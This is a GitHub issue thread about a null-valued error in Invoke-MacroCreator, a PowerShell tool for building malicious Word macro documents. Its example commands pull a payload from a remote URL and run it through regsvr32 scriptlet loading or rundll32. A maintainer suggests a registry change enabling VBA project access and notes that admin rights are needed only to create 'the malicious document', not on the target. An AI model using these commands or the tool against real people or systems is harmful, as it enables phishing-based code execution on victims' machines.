### ISSUE TITLE
Null valued expression in examples

### ISSUE THREAD

**Issue by vivami** [Arno0x/PowerShellScripts#3]
I'm having the following error in pretty much all the things that I've tried. The error also occurs in the example `Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://server/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e`

```
You cannot call a method on a null-valued expression.
At C:\Users\usr\Desktop\Invoke-MacroCreator.ps1:441 char:2
+     $docModule = $document.VBProject.VBComponents.Item(1)
```

I'm trying to execute a DLL via rundll32 via the following command: `Invoke-MacroCreator -i C:\local\path\to\dll.dll -t file -url 'http://IP_addr/index.html' -d html -c 'rundll32.exe dll.dll,EntryPoint'`

Thanks for your help!

**Comment by Arno0x** [comment]
Seems like the `$document` variable is $null. Do you have Microsoft Office, especially Word, installed on your computer ?

**Comment by vivami** [comment]
Yes I do.

**Comment by Arno0x** [comment]
It might be related to the VBOM access being disabled by default on your computer:

Try adding the following line somewhere in the code before the line causing the error:
`New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$WordVersion\word\Security" -Name AccessVBOM -Value 1 -PropertyType DWORD -Force | Out-Null`

Or you could also modify this value by hand in the registry directly.

Let me know if it works, I might add this in my code as well.

**Comment by vivami** [comment]
Setting it manually worked. You will need Admin privs. Thanks a lot!

**Comment by Arno0x** [comment]
Indeed, however admin privs are only required in order to create the malicious document, not on the target side: once the document is created, you're good to go :)
